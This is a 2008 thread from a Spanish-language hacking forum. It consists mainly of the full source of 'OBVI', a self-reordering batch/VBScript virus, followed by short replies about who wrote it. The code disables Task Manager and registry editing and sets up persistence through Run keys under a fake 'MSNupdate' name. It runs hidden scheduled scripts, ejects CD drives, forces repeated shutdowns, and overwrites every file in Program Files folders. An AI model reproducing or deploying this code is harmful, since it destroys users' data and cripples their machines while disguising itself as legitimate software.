elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [virus-batch|vbs] OBVI
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [virus-batch|vbs] OBVI  (Leído 2,610 veces)
The Shadow

Desconectado Desconectado

Mensajes: 27



Ver Perfil
[virus-batch|vbs] OBVI
« en: 16 Febrero 2008, 00:16 am »

Código:
@echo off
rem ----------------------------------------------------------------------
rem OBVI =================  .........   25/11/07
rem well it is a poliformic .bat file virus ... mmmmm is like another virus life form ... do not infect anything
rem only have fun with the victim xD ....
rem ...well nothing special but i think is really nice to see a poliformic batch script virus
rem enjoy!
rem OBVI (Oligomorphic Batch VIrus)
echo  ============================================
echo  |OBVI by Shadow (The Shadow) whatever way |
echo  ============================================
set a="%windir%\prntcrlt.bat"
if exist %a% goto code
echo set shell = CreateObject("wscript.shell") > %windir%\run.vbs
echo shell.run "cmd /c prntcrlt.bat", vbHide >> %windir%\run.vbs
copy %0 %a%
:qep
set hor=%time:~0,2%
set tim=%time:~3%
set tim=%tim:~0,2%
set /A tim=%tim% + 5
if /I %tim% geq 60 (set /a hor=%hor%+1
                    set /a tim=%tim%-60
                    if /I %tim% lss 10 (set tim=0%tim%))
set ecx=%hor%:%tim%
at %ecx% "%windir%\run.vbs"
exit
:crea
echo 0 > vals.tk
echo 1 >> vals.tk
echo 2 >> vals.tk
echo 3 >> vals.tk
echo 4 >> vals.tk
echo 5 >> vals.tk
echo 6 >> vals.tk
echo 7 >> vals.tk
echo 8 >> vals.tk
echo 9 >> vals.tk
echo A >> vals.tk
echo B >> vals.tk
echo C >> vals.tk
echo D >> vals.tk
echo E >> vals.tk
echo F >> vals.tk
goto for
:modulcrea
set tar=%tar:~,1%
if /I %tar% leq 9 ( if %tar% == 9 ( set tar2=A
                                    goto klop ) 
                    set /A tar2=%tar%+1 ) else ( if %tar% == A set tar2=B
                                                 if %tar% == B set tar2=C
                                                 if %tar% == C set tar2=D
                                                 if %tar% == D set tar2=E
                                                 if %tar% == E set tar2=F )
:klop
echo :modul%tar% ¿mol%tar%¿ >> modul.tk
if %tar%==0 ( echo reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t Reg_dword /d 1 /f ¿mol%tar%¿ >> modul.tk
              echo reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t Reg_dword /d 1 /f ¿mol%tar%¿ >> modul.tk
              echo goto ¿1_jk ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==1 ( echo :_jk ¿mol%tar%¿ >> modul.tk
              echo copy "¿windir¿\kpore.bat" "¿windir¿\k0.bat" ¿mol%tar%¿ >> modul.tk
              echo reg add "HKLM\software\microsoft\windows\currentversion\policies\explorer\run" /V MSNupdate /d "%windir%\k0.vbs" /f ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==2 ( echo echo set shell = CreateObject¡"wscript.shell"$ ^> %windir%\k0.vbs ¿mol%tar%¿ >> modul.tk
              echo echo shell.run "cmd /c k0.bat ini", vbHide ^>^> %windir%\k0.vbs ¿mol%tar%¿ >> modul.tk
      echo echo Set fg = CreateObject¡"WMPlayer.OCX.7"$ ^> conf.vbs ¿mol%tar%¿ >> modul.tk
              echo echo Set fgh = fg.cdromCollection ^>^> conf.vbs   ¿mol%tar%¿ >> modul.tk
              echo echo if fgh.Count  then ^>^> conf.vbs  ¿mol%tar%¿ >> modul.tk
              echo echo       For i = 0 to fgh.Count-1 ^>^> conf.vbs  ¿mol%tar%¿ >> modul.tk
              echo echo             fgh.Item¡i$.Eject ^>^> conf.vbs  ¿mol%tar%¿ >> modul.tk
              echo echo       Next   ' cdrom ^>^> conf.vbs  ¿mol%tar%¿ >> modul.tk
              echo echo End If ^>^> conf.vbs ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==3 ( echo :ini_jk ¿mol%tar%¿ >> modul.tk
              echo start conf.vbs ¿mol%tar%¿ >> modul.tk
              echo set hor=¿time:~0,2¿ ¿mol%tar%¿ >> modul.tk
              echo set tim=¿time:~3¿ ¿mol%tar%¿ >> modul.tk
              echo set tim=¿tim:~0,2¿ ¿mol%tar%¿ >> modul.tk
              echo set /A tim=¿tim¿+1 ¿mol%tar%¿ >> modul.tk
              echo if /I ¿tim¿ geq 60 ¡set /a hor=¿hor¿+1 ¿mol%tar%¿ >> modul.tk
              echo                     set /a tim=¿tim¿-60 ¿mol%tar%¿ >> modul.tk
              echo                     if /I ¿tim¿ lss 10 ¡set tim=0¿tim¿$$ ¿mol%tar%¿ >> modul.tk
              echo set ecx=¿hor:~0,2¿:¿tim¿ ¿mol%tar%¿ >> modul.tk
              echo at ¿ecx¿ "¿windir¿\k0.vbs" ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==4 ( echo cd "¿programfiles¿" ¿mol%tar%¿ >> modul.tk
              echo dir /B ^> ¿homedrive¿\dir.txt ¿mol%tar%¿ >> modul.tk
              echo goto for ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==5 ( echo reg add "HKLM\software\microsoft\windows\currentversion\policies\explorer\run" /V MSNupdate2 /d "shutdown -r -f -t 2423" /f ¿mol%tar%¿ >> modul.tk
              echo shutdown -r -f -t 242 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==6 ( echo shutdown -r -f -t 12 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==7 ( echo :worm ¿mol%tar%¿ >> modul.tk
              echo set target=¿1 ¿mol%tar%¿ >> modul.tk
              echo cd "¿target¿" ¿mol%tar%¿ >> modul.tk
              echo for ¿¿e in ¡*.*$ do echo Exworm by Shadow ^> ¿¿e ¿mol%tar%¿ >> modul.tk
              echo cd "¿programfiles¿" ¿mol%tar%¿ >> modul.tk
              echo goto :EOF ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==8 ( echo shutdown -r -f -t 43 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==9 ( echo :ERRNO ¿mol%tar%¿ >> modul.tk
              echo for /f "tokens=* " ¿¿a in ¡¿homedir¿\dir.txt$ do call :worm "¿¿a" ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==A ( echo shutdown -s -f -t 53 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==B ( echo shutdown -s -f -t 22 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==C ( echo shutdown -r -f -t 11 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==D ( echo shutdown -r -f -t 666 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==E ( echo shutdown -s -f -t 23 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==F ( echo exit ¿mol%tar%¿ >> modul.tk
              goto :EOF )
:for
for /f "tokens=*" %%a in (vals.tk) do (set tar=%%a && call :modulcrea)
:sig
echo set shell = CreateObject("Scripting.FileSystemObject") > rep.vbs
echo set file = shell.OpenTextFile("modul.tk") >> rep.vbs
echo read = file.ReadAll >> rep.vbs
echo repla = replace(read,"¿",chr(37)) >> rep.vbs
echo repla1 = replace(repla,"¡",chr(40)) >> rep.vbs
echo repla2 = replace(repla1,"$",chr(41)) >> rep.vbs
echo set b=shell.CreateTextFile("module.tk") >> rep.vbs
echo b.close >> rep.vbs
echo set d=shell.OpenTextFile("module.tk",2) >> rep.vbs
echo d.write repla2 >> rep.vbs
echo d.close >> rep.vbs
start rep.vbs
:code
if not exist module.tk goto crea
echo set shell = CreateObject("wscript.shell") > run2.vbs
echo shell.run "cmd /c kpore.bat", vbHide >> run2.vbs
ping -n 7 localhost > nul
set fail=module.tk
set vir=kpore.bat
echo @echo off > %vir%
set a=%time:~,5%
set b=%a:~3,2%
del modul.tk vals.tk rep.vbs
if /I %b% geq 0 (if /I %b% lss 10 goto a)
if /I %b% geq 10 (if /I %b% lss 20 goto b)
if /I %b% geq 20 (if /I %b% lss 30 goto c)
if /I %b% geq 30 (if /I %b% lss 40 goto d)
if /I %b% geq 40 (if /I %b% lss 50 goto e)
if /I %b% geq 50 (if /I %b% lss 60 goto f)
goto crea
:a
find "mol0" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
start run2.vbs
goto qep
:b
find "mol4" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
start run2.vbs
goto qep
:C
find "molB" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
start run2.vbs
goto qep
:d
find "molF" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
start run2.vbs
goto qep
:e
find "mol8" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
start run2.vbs
goto qep
:f
find "mol5" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
start run2.vbs
goto qep


En línea




MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: [virus-batch|vbs] OBVI
« Respuesta #1 en: 17 Febrero 2008, 01:21 am »

no me da ganas de leerme todo el code, pero ya q lo posteas y seguramente no es tuyo, Debes dar 2 cosas: Fuente, y que haces el code.


En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
The Shadow

Desconectado Desconectado

Mensajes: 27



Ver Perfil
Re: [virus-batch|vbs] OBVI
« Respuesta #2 en: 18 Febrero 2008, 21:29 pm »

no me da ganas de leerme todo el code, pero ya q lo posteas y seguramente no es tuyo, Debes dar 2 cosas: Fuente, y que haces el code.

weno ... 1:

fuente original: -Concurso de batch de foro.el-hacker.com (sección batch) el cual gane ..xD ... pos en estos momentos el foro esta en busqda de dominio asiq ... cual lo tenga posteo el link del concurso.. ah ... x cierto... Autor: The Shadow

fuentes alternas: -http://latinohack.com/foro/index.php?topic=666.0 Autor:The Shadow

2:  los rems del principio explican el funcionamiento.

PD: ay veces cuando tratas de acer caer a algien ... te caes tu.. xD ... sin rencores.... tb ubiera exo lo mismo q tu si no te conociera.. jaja ...

Saludos!
                         
En línea




MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: [virus-batch|vbs] OBVI
« Respuesta #3 en: 19 Febrero 2008, 01:38 am »

ok, es verdad, solo q como ponias el code solo sin nada, aparte uno puede modificar a gusto las rem para poner ::By me por ejemplo, pero bueno.

Los dos estubimos mal ^^
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
The Shadow

Desconectado Desconectado

Mensajes: 27



Ver Perfil
Re: [virus-batch|vbs] OBVI
« Respuesta #4 en: 22 Febrero 2008, 20:06 pm »

xD .... si lo entiendo .... como ya dije ... sin rencores..jeje

Saludos!
En línea




Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Batch] [Virus] Spank Me!
Scripting
Eleкtro 6 4,083 Último mensaje 4 Febrero 2012, 19:29 pm
por Dany3j
[src]batch-virus]f_to « 1 2 »
Scripting
0x3c 10 6,441 Último mensaje 18 Enero 2013, 22:36 pm
por The_Mushrr00m
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines